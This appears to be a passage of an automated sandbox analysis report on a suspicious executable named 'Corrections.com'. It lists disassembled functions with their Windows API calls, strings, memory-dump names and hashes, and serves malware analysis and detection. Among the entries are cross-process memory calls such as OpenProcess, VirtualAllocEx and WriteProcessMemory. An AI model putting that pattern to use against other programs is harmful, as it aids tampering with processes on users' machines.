Opcode Fuzzy Hash: 0f6e78e021462244d70c11e9a6488952d79b14903c270b0a8845b090d503dd18
Instruction Fuzzy Hash: A401A271801B15DFCB30AF6AD980816FBF9BF903153158A3ED1A752931C7B0A994DF80

Function 009865AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 009865BF
GetWindowTextW.USER32(00000000,?,00000100), ref: 009865D6
MessageBeep.USER32(00000000), ref: 009865EE
KillTimer.USER32(?,0000040A), ref: 0098660A
EndDialog.USER32(?,00000001), ref: 00986624

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: d7193bbe7b0d97c53567f5ed326bbcbb68e883a190536407603d18bfefb68f74
Instruction ID: 241321d4cbfbdd908d87f8534c6cc43276542754d9d822cf6b0563f41e6dc5fd
Opcode Fuzzy Hash: d7193bbe7b0d97c53567f5ed326bbcbb68e883a190536407603d18bfefb68f74
Instruction Fuzzy Hash: E0018130515304ABEB206F20DE4EF9A7BB8FB00715F000669B586A61E1FBF4AA44DB90

Function 0095DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0095DAD2

Part of subcall function 00952D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0095DB51,009F1DC4,00000000,009F1DC4,00000000,?,0095DB78,009F1DC4,00000007,009F1DC4,?,0095DF75,009F1DC4), ref: 00952D4E
Part of subcall function 00952D38: GetLastError.KERNEL32(009F1DC4,?,0095DB51,009F1DC4,00000000,009F1DC4,00000000,?,0095DB78,009F1DC4,00000007,009F1DC4,?,0095DF75,009F1DC4,009F1DC4), ref: 00952D60

_free.LIBCMT ref: 0095DAE4
_free.LIBCMT ref: 0095DAF6
_free.LIBCMT ref: 0095DB08
_free.LIBCMT ref: 0095DB1A

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 97c483fdc292060cc445df4986545ef8443b40599571e10091e78552c924577a
Instruction ID: 495446867e69d41622351c99396abe4f2e9fd038d0026318e6653bce1a2d7ff5
Opcode Fuzzy Hash: 97c483fdc292060cc445df4986545ef8443b40599571e10091e78552c924577a
Instruction Fuzzy Hash: D0F0303255B248AB8634EB6AF9C2D1B77EEFE557127A50C05F809DB541CB30FC848B64

Function 00952610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0095262E

Part of subcall function 00952D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0095DB51,009F1DC4,00000000,009F1DC4,00000000,?,0095DB78,009F1DC4,00000007,009F1DC4,?,0095DF75,009F1DC4), ref: 00952D4E
Part of subcall function 00952D38: GetLastError.KERNEL32(009F1DC4,?,0095DB51,009F1DC4,00000000,009F1DC4,00000000,?,0095DB78,009F1DC4,00000007,009F1DC4,?,0095DF75,009F1DC4,009F1DC4), ref: 00952D60

_free.LIBCMT ref: 00952640
_free.LIBCMT ref: 00952653
_free.LIBCMT ref: 00952664
_free.LIBCMT ref: 00952675

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf495b4ffba9d91dda93087a2068bbbf9c0b69d1f8f30c379b3afb2549da8be3
Instruction ID: e4bd82edf99a80a6a55912b0371e372608edc6d22573efbd14fda518eb4f534c
Opcode Fuzzy Hash: bf495b4ffba9d91dda93087a2068bbbf9c0b69d1f8f30c379b3afb2549da8be3
Instruction Fuzzy Hash: D2F0DA7492B6219BCA16EF59EC41AA83BA4FB7A752315090BF8249A2B5C7310905FFC4

Function 009512B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00951469
__freea.LIBCMT ref: 00951487

Part of subcall function 009518A7: _free.LIBCMT ref: 009518BF

Strings

am/pm, xrefs: 009514EA
a/p, xrefs: 0095154E

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 1c65accca0166e7c5dc59d90e88df3f4631057b5f260325c2b505f349bfe1f2f
Instruction ID: acfc23fb102f0983b7c996833b827add65a1f7828c27d4d4035c834e6824577f
Opcode Fuzzy Hash: 1c65accca0166e7c5dc59d90e88df3f4631057b5f260325c2b505f349bfe1f2f
Instruction Fuzzy Hash: 13D14A75900206DBCB24DF6AC855BFAB7B9FF45302F28455AED029B260D3399D89CB90

Function 00983063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0098BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00982B1D,?,?,00000034,00000800,?,00000034), ref: 0098BDF4

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 009830AD

Part of subcall function 0098BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00982B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 0098BDBF

Part of subcall function 0098BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 0098BD1C
Part of subcall function 0098BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00982AE1,00000034,?,?,00001004,00000000,00000000), ref: 0098BD2C
Part of subcall function 0098BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00982AE1,00000034,?,?,00001004,00000000,00000000), ref: 0098BD42

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0098311A
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00983167

Strings

@, xrefs: 0098317F

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 63bcfa8740360c7782ccbd6fd53cc113bc96cc05b8bff0c84a6fff431fc9a30b
Instruction ID: 8054a054c70d480b4f5d378b167f34b418df8144e9a27a5dcae0bc41e52ab35b
Opcode Fuzzy Hash: 63bcfa8740360c7782ccbd6fd53cc113bc96cc05b8bff0c84a6fff431fc9a30b
Instruction Fuzzy Hash: 1D412CB2900218BEDB10EBA4CD85BDEBBB8EF45700F048095FA45B7280DB706F85CB60

Function 00951A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\628056\Corrections.com,00000104), ref: 00951AD9
_free.LIBCMT ref: 00951BA4
_free.LIBCMT ref: 00951BAE

Strings

C:\Users\user\AppData\Local\Temp\628056\Corrections.com, xrefs: 00951AD0, 00951AD7, 00951B06, 00951B3E

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\628056\Corrections.com
API String ID: 2506810119-1710334032
Opcode ID: 7e770ea1e375cdb597f7751b654021ee124245c579c942206dbd7ea2f6f26b22
Instruction ID: 4dd00b7c5a4ca00c1668f648e5c94e55aa92febd46131188d20faa7677664861
Opcode Fuzzy Hash: 7e770ea1e375cdb597f7751b654021ee124245c579c942206dbd7ea2f6f26b22
Instruction Fuzzy Hash: 65319071A04218AFCB25DF9ADC81FAEBBFCEF85711B1041A6FC1497215E6708E48DB90

Function 0098CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0098CBB1
DeleteMenu.USER32(?,00000007,00000000), ref: 0098CBF7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009F29C0,018462D8), ref: 0098CC40

Strings

0, xrefs: 0098CB8A

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: b04c27bb2e3dc5b0c87ecec5016215d2644e49800423695adf6731fc881b9d70
Instruction ID: 89e76dc839c8e08d8a2026619cd3684015b3c695ae2a29e648526eea05079db7
Opcode Fuzzy Hash: b04c27bb2e3dc5b0c87ecec5016215d2644e49800423695adf6731fc881b9d70
Instruction Fuzzy Hash: 2241BFB12043029FD720EF24DD85F5ABBE8AF85724F144A1DF5A997391DB70E904CB62

Function 009B4EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,009BDCD0,00000000,?,?,?,?), ref: 009B4F48
GetWindowLongW.USER32 ref: 009B4F65
SetWindowLongW.USER32(?,000000F0,00000000), ref: 009B4F75

Strings

SysTreeView32, xrefs: 009B4F1A

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: e439c9c08d31faff89b3a00c1256915f9846fa4d21d2a533bbc2330982e037a9
Instruction ID: ec33b07585673e42e4529592e12d6adbe3dc9795a6d292bf60a97f6d8a3b1f84
Opcode Fuzzy Hash: e439c9c08d31faff89b3a00c1256915f9846fa4d21d2a533bbc2330982e037a9
Instruction Fuzzy Hash: EF31BE71214205AFDB218F78DC45BEA7BA9EB48334F204724F979A31E1D770EC60AB50

Function 009A3AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009A3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,009A3AD4,?,?), ref: 009A3DD5

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 009A3AD7
_wcslen.LIBCMT ref: 009A3AF8
htons.WSOCK32(00000000,?,?,00000000), ref: 009A3B63

Strings

255.255.255.255, xrefs: 009A3AF2, 009A3AF7

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: eb6f736de084a4a276b1e8e4110ca9e4a787c6b44507f1ac659321c83f2f2d51
Instruction ID: c3a964073951e2c7a3e68e5ae5995fd04249407940b90996762f0cdee0a58358
Opcode Fuzzy Hash: eb6f736de084a4a276b1e8e4110ca9e4a787c6b44507f1ac659321c83f2f2d51
Instruction Fuzzy Hash: 8131AF792002019FCB10CF69C585AB977A6EF56324F24C159F8168B3A2D731EE41CBB0

Function 009B4954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 009B49DC
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 009B49F0
SendMessageW.USER32(?,00001002,00000000,?), ref: 009B4A14

Strings

SysMonthCal32, xrefs: 009B49A7

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 46b212c2ca7352d9a0563dfe10473f9ddd0b502ceb68eba52d2ba7e0058f1e3c
Instruction ID: 398a386bdf721586d573d1559695784f485048d2b0757e48eb5c988cd65e3c77
Opcode Fuzzy Hash: 46b212c2ca7352d9a0563dfe10473f9ddd0b502ceb68eba52d2ba7e0058f1e3c
Instruction Fuzzy Hash: B221BF32650219BBDF118F94CD82FEB3B69EF88728F110214FA156B1D1D6B1A855EB90

Function 009B50F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 009B51A3
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 009B51B1
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009B51B8

Strings

msctls_updown32, xrefs: 009B5122

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 577581ccd56ebbad27c0115440ba4629b6cf0c7daa17e9d2c0c43afcdc586c54
Instruction ID: 945b4b399a634aff181ea7134b1beb2e562820ad236a08cecbda278a962b6e36
Opcode Fuzzy Hash: 577581ccd56ebbad27c0115440ba4629b6cf0c7daa17e9d2c0c43afcdc586c54
Instruction Fuzzy Hash: 62219DB5604609AFDB00DF68DD81FBB37ADEF9A368B050149F9009B361CB70EC11DAA0

Function 009B4253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 009B42DC
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 009B42EC
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 009B4312

Strings

Listbox, xrefs: 009B42AB

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: a1a6ea5846f86e6cab5f2209e3d65e77f1b5fa1b78c3d7fb2afa70de0753aa15
Instruction ID: ea32146f38c90510171c2346288fb21cbbe16687579a47fb0d2f80c7c0f96720
Opcode Fuzzy Hash: a1a6ea5846f86e6cab5f2209e3d65e77f1b5fa1b78c3d7fb2afa70de0753aa15
Instruction Fuzzy Hash: 7821AF32614118BBEF118F94CD84FEB3B6EEB89764F118114F9109B191CA719C52A7A0

Function 00995439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0099544D
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 009954A1
SetErrorMode.KERNEL32(00000000,?,?,009BDCD0), ref: 00995515

Strings

%lu, xrefs: 009954B4

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: f019d1ee8f3703007ef3c9c0f31fd131ab6b0e34a48aa74262459241976f4688
Instruction ID: 3ae588e56bdbddb649cd95e6ffd24e1eaaa078a0440b128db65f802dc676d72e
Opcode Fuzzy Hash: f019d1ee8f3703007ef3c9c0f31fd131ab6b0e34a48aa74262459241976f4688
Instruction Fuzzy Hash: 2B319370A04109AFDB11DF68C984EAA77F8EF44308F1540A4F409DB362D771EE41CB61

Function 009B4C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009B4CED
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009B4D02
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 009B4D0F

Strings

msctls_trackbar32, xrefs: 009B4CC4

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: d7a4f62f6cee69b3ebef0aed27c90edc2276e6764273aadd2766b1b8399084c1
Instruction ID: e3a2d690f7af80f1a616d59907ba7436420de64311ecfdab31942997fe049ea7
Opcode Fuzzy Hash: d7a4f62f6cee69b3ebef0aed27c90edc2276e6764273aadd2766b1b8399084c1
Instruction Fuzzy Hash: 4A11C171240248BEEF215EA5CC46FEB3BACEB85B64F110514FA55E60A1D671D851AB10

Function 0098389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00928577: _wcslen.LIBCMT ref: 0092858A

Part of subcall function 009836F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00983712
Part of subcall function 009836F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00983723
Part of subcall function 009836F4: GetCurrentThreadId.KERNEL32 ref: 0098372A
Part of subcall function 009836F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00983731

GetFocus.USER32 ref: 009838C4

Part of subcall function 0098373B: GetParent.USER32(00000000), ref: 00983746

GetClassNameW.USER32(?,?,00000100), ref: 0098390F
EnumChildWindows.USER32(?,00983987), ref: 00983937

Strings

%s%d, xrefs: 0098394B

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 17beb06d1ec937ff4082a97720b4d7a12dfd21ec8f313d172a38444c785973da
Instruction ID: 5de36ef2fcd270d9ac19d829998b4c6849f9961096d00c37c78dd8799fa9af5e
Opcode Fuzzy Hash: 17beb06d1ec937ff4082a97720b4d7a12dfd21ec8f313d172a38444c785973da
Instruction Fuzzy Hash: F611D571600205ABCF11BF749D86FEE77699FD4704F008075FD099B296EE719A059B20

Function 009B6321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009B6360
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009B638D
DrawMenuBar.USER32(?), ref: 009B639C

Strings

0, xrefs: 009B632E

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: e40c3e22a865c4623dac47a2598500d2decef1a63b5afa9f93a6438578184f6c
Instruction ID: cf717e67660cfd8a6c3dfa6fa13e638416a185c7ea124ffaa35f5cd1919d66be
Opcode Fuzzy Hash: e40c3e22a865c4623dac47a2598500d2decef1a63b5afa9f93a6438578184f6c
Instruction Fuzzy Hash: 8E016D32514218AFDB219F11DC84FEEBBB8FB88361F108099F949D6150DB788A85EF21

Function 0097E778 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0097E797
FreeLibrary.KERNEL32 ref: 0097E7BD

Strings

GetSystemWow64DirectoryW, xrefs: 0097E791
X64, xrefs: 0097E680

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

